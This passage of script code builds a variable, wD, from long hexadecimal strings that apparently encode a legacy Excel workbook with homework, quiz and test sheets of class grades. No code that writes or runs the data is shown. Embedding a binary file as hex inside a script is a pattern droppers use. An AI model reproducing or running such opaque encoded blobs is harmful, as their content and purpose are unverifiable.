wD+="000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a"
wD+="6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413"
wD+="92010000000000000000ec00080000000df000000000b601120012020000000000000000260"
wD+="01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062"
wD+="65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0"
wD+="004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185"
wD+="00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c"
wD+="60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800"
wD+="08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f"
wD+="0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008"
wD+="0000000df000000000b60112001202000000000000000024001000000000003c00250000225"
wD+="041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010"
wD+="0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000"
wD+="2000000040400003e021200b600100000004000000000000000000000001d000f0003040003"
wD+="0000000100040004000303ef000600050037000000670817006708000000000000000000000"
wD+="20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218"
wD+="0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000"
wD+="f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00"
wD+="02000000820002000100800008000000000000000000250204000000ff0081000200c104140"
wD+="0000015000000830002000000840002000000a10022000000ff000100010001000400020001"
wD+="ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005"
wD+="500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400"
wD+="7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85"
wD+="a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000"
wD+="00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0"
wD+="00000000020010f0008021000030000000900ff000000000000010f00080210000400000009"
wD+="00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000"
wD+="0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000"
wD+="080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080"
wD+="210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f"
wD+="00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002"
wD+="0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000"
wD+="000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0"
wD+="00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a"
wD+="00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000"
wD+="0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000"
wD+="170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080"
wD+="21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f"
wD+="00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000"
wD+="0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000"
wD+="000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000"
wD+="00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003"
wD+="000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000"
wD+="a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100"
wD+="0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080"
wD+="01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000"
wD+="007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073"
wD+="7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002"
wD+="c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999"
wD+="99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0"
wD+="240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0"
wD+="002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0"
wD+="24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180"
wD+="002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003"
wD+="0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140"
wD+="002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a"
wD+="ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006c006fd000a000"
wD+="30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000"
wD+="7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050"
wD+="000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd"
wD+="000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000"
wD+="9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304"
wD+="1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04"
wD+="4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007"
wD+="000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400"
wD+="30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f"
wD+="0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080"
wD+="00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000"
wD+="000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000"
wD+="a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080"
wD+="5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020"
wD+="00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012"
wD+="000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400"
wD+="60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415"
wD+="440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0"
wD+="00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000"
wD+="007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000"
wD+="f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00"
wD+="100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000"
wD+="0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f"
wD+="0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005"
wD+="140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6"
wD+="e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200"
wD+="026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013"
wD+="0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000"
wD+="6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200"
wD+="44130002c044130003c0041544130006c006060023001300080027006766666666663440000"
wD+="0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00"
wD+="140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000"
wD+="00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a"
wD+="8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001"
wD+="50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940"
wD+="fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0"
wD+="000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017"
wD+="0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002"
wD+="800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417"
wD+="0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180"
wD+="002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028"
wD+="00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180"
wD+="006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900"
wD+="02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0"
wD+="20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c"
wD+="0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000"
wD+="1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600"
wD+="0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441"
wD+="c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001"
wD+="000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000"
wD+="a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00"
wD+="1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f"
wD+="e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a"
wD+="001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003"
wD+="c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000"
wD+="2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000"
wD+="10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a"
wD+="000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000"
wD+="2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00"
wD+="03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000"
wD+="002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000"
wD+="0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001"
wD+="0f012000000010001000000010000000200000002000000000011f0000000005d0046001500"
wD+="120014000100012100000000ac199201000000000c001400000000000000000000000100080"
wD+="00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004"
wD+="f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000"
wD+="800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000"
wD+="0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0"
wD+="01a001500120005000300116000000000781a920100000000000000000908100000062000e2"
wD+="28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001"
wD+="20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300"
wD+="60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80"
wD+="001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133"
wD+="100000a00004000100010064100800000001000000010032100400000002003310000007100"
wD+="c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000"
wD+="03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000"
wD+="2000d100e000000050147005200410044004500511013000102000000000b003b010002001e"
wD+="0002000200511013000202000000000b003b010002001e00000001005110080003010000000"
wD+="0000006100800ffff000000000000331000005f100200000034100000451002000000341000"
wD+="00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000"
wD+="00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000"
wD+="00000000261002000d005110080000010000000000003410000024100200030025102000020"
wD+="2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014"
wD+="000200020000000000000000000000000000000000261002000e00511008000001000000000"
wD+="00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000"
wD+="4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000"
wD+="000000000000000003310000020100800010001000100010062101200000000000100000001"
wD+="00000000000000ef001e101e000200030100000000000000000000000000000000000000000"
wD+="3004d002900261002000c00341000001d101200010000000000000000000000000000000000"
wD+="331000001f102a0000000000000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000001f011e101e00020003010000000000000000000000000000000000"
wD+="00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100"
wD+="00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000"
wD+="000000000100000016004f00341000001410140000000000000000000000000000000000000"
wD+="00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00"
wD+="00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000"
wD+="000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100"
wD+="4d0030090000331000004f10140002000200000000000000000000000000000000005110080"
wD+="000010000000000003410000034100000341000003410000025102000020201000000000095"
wD+="0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000"
wD+="0001a0000009700000034000000261002000d005110080000010000000000000d1014000000"
wD+="080148006f006d00650077006f0072006b00271006000100000000003410000034100000000"
wD+="20e00000000000b000000000001000000651002000200040235000000000000001600013100"
wD+="2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350"
wD+="03000320004022f0001000000000013000131002f0033003100200032002f00310020004300"
wD+="68002000540065007300740020004100200004022d0002000000000012000132002f0031002"
wD+="c003200200070002e00200035003100360020002d0020003500310038000402270003000000"
wD+="00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023"
wD+="10004000000000014000132002f0036002c0020003700200070002e00200037003900390020"
wD+="00230031002d003200350020000402290005000000000010000170002e00200035003300310"
wD+="02000350033003800200032002f0038002c0039000402370006000000000017000139002e00"
wD+="3300200039002e00340020007000790074006800610067006f007200650061006e002000740"
wD+="068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100"
wD+="7400680020004100200074006500730074000402330008000000000015000133002f0031002"
wD+="c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402"
wD+="21000900000000000c00016c006f0063007500730020007000610063006b006500740004024"
wD+="7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074"
wD+="0065007300200061006e0064002000700072006100630020004100200073006800740065100"
wD+="200010003020e00000000000000000000000040594003020e000100000000000000000000c0"
wD+="504003020e000200000000009a99999999d9534003020e00030000000000000000000000594"
wD+="003020e00040000000000000000000000594003020e00050000000000000000000000000003"
wD+="020e00060000000000000000000000000003020e00070000000000000000000000594003020"
wD+="e00080000000000000000000000000003020e00090000000000000000000000594003020e00"
wD+="0a000000000000000000000059406510020003000a0000003e021200b600030000004000000"
wD+="000000000000000001d000f00030300030000000100030003000303ef000600050037000000"
wD+="67081700670800000000000000000000020001ffffffff004000000a0000000908100000061"
wD+="000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000"
wD+="076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6"
wD+="2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000"
wD+="00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002"
wD+="2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500"
wD+="020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0"
wD+="000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000"
wD+="7175697a00020e00010000002500000000000900000008021000010000000900ff000000000"
wD+="000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000"
wD+="00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f"
wD+="f000000000000010f0008021000060000000900ff000000000020010f000802100007000000"
wD+="0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090"
wD+="000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210"
wD+="000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000"
wD+="80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001"
wD+="0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000"
wD+="020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000"
wD+="00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f"
wD+="f000000000020010f0008021000150000000300ff000000000020010f000802100016000000"
wD+="0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180"
wD+="000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210"
wD+="001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000"
wD+="80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001"
wD+="0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000"
wD+="020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001"
wD+="0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f"
wD+="d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00"
wD+="4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020"
wD+="001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd"
wD+="000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000"
wD+="4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500"
wD+="00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060"
wD+="02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00"
wD+="02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000"
wD+="0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00"
wD+="070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444"
wD+="0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f"
wD+="0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000"
wD+="90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000"
wD+="7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0"
wD+="00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c"
wD+="0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f"
wD+="d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00"
wD+="10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0"
wD+="000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd"
wD+="000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000"
wD+="0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100"
wD+="02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0"
wD+="20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009"
wD+="0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000"
wD+="1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00"
wD+="0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190"
wD+="00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000"
wD+="000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000"
wD+="a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000"
wD+="0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020"
wD+="00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"
wD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"
wD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"
wD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"
wD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"
wD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"
wD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200"
wD+="1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0"
wD+="02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007"
wD+="00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000"
wD+="0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00"
wD+="2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740"
wD+="0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040"
wD+="0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000"
wD+="0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0"
wD+="52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080"
wD+="00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002"
wD+="000000000011f0000000005d0046001500120014000100012100000000441d9201000000000"
wD+="c00140000000000000000000000010008000000100000001300ee1f00000800070001030000"
wD+="0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000"
wD+="093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900"
wD+="004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005"
wD+="2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e"
wD+="3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000"
wD+="0000022001000000000003c00230000496e73657274207765696768746564207175697a2061"
wD+="76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0"
wD+="005f010000000000017f00800000002000000020c00003e021200b600000000004000000000"
wD+="000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0"
wD+="000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000"
wD+="0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001"
wD+="0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000"
wD+="08000000000000000000250204000000ff0081000200c104140000001500000083000200000"
wD+="0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000"
wD+="000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006"
wD+="d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000"
wD+="0000000000000000007465737400020e0001000000270000000000080000000802100001000"
wD+="0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000"
wD+="030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080"
wD+="21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f"
wD+="0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000"
wD+="0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000"
wD+="000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0"
wD+="00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008"
wD+="00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000"
wD+="0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000"
wD+="120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080"
wD+="21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f"
wD+="0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002"
wD+="0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000"
wD+="000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0"
wD+="00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003"
wD+="00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000"
wD+="0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00"
wD+="01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010"
wD+="004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd"
wD+="000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002"
wD+="20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300"
wD+="01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0"
wD+="00a00040001000f000a0000007e020a00040002000f0000005940fd000a00050000000f0005"
wD+="000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000"
wD+="0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00"
wD+="0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000"
wD+="04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002"
wD+="000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c"
wD+="0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000"
wD+="00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000"
wD+="f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00"
wD+="0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594"
wD+="0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f"
wD+="0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000"
wD+="d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000"
wD+="7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0"
wD+="00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010"
wD+="0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f"
wD+="d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00"
wD+="15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130"
wD+="000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd"
wD+="000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000"
wD+="0000000fd000a00150000000f0018000000fd000a00150001000f000a0000007e020a001500"
wD+="02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0"
wD+="20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009"
wD+="0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000"
wD+="1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00"
wD+="0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0"
wD+="00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000"
wD+="000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000"
wD+="a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000"
wD+="5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020"
wD+="00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a"
wD+="001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000"
wD+="0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00"
wD+="2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0"
wD+="02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000"
wD+="000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002"
wD+="2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000"
wD+="fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0"
wD+="046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa"
wD+="000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02"
wD+="8000000010009f0100000000000000000000000000000000000000002000af0080000000010"
wD+="0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000"
wD+="07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000"
wD+="00010000000200000002000000000011f0000000005d0046001500120014000100012100000"
wD+="0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f"
wD+="000008000800010300000a0014005700000000003e021200b60000000000400000000000000"
wD+="0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000"
wD+="0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67"
wD+="30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1"
wD+="d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000"
wD+="0000000250204000000ff0081000200c1041400000015000000830002000000840002000000"
wD+="4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0"
wD+="04f005200200036003000300020004500530043002f005000200032000000000001040005dc"
wD+="008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007"
wD+="400740065007200000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000010"
wD+="000000000000002000000020000000100000030010000000000000000000000000000000000"
wD+="0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000"
wD+="000000000000000080000000100000001000000000002000000040000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000580000004f535045414182820200000000000000010000000000000000000000000000"
wD+="0000000000010000000000000004000000000000000000000000000000000000006a0000000"
wD+="000000003000000010000000f000000a1002200010064000100010001000200680168010000"
wD+="00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050"
wD+="0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000"
wD+="0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000"
wD+="000000000010f0008021000040000000500ff000000000000010f0008021000050000000500"
wD+="ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000"
wD+="00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009"
wD+="0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021"
wD+="0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00"
wD+="080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000"
wD+="10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000"
wD+="0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000"
wD+="000000000010f0008021000130000000200ff000000000000010f0008021000140000000200"
wD+="ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000"
wD+="00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018"
wD+="0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021"
wD+="0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00"
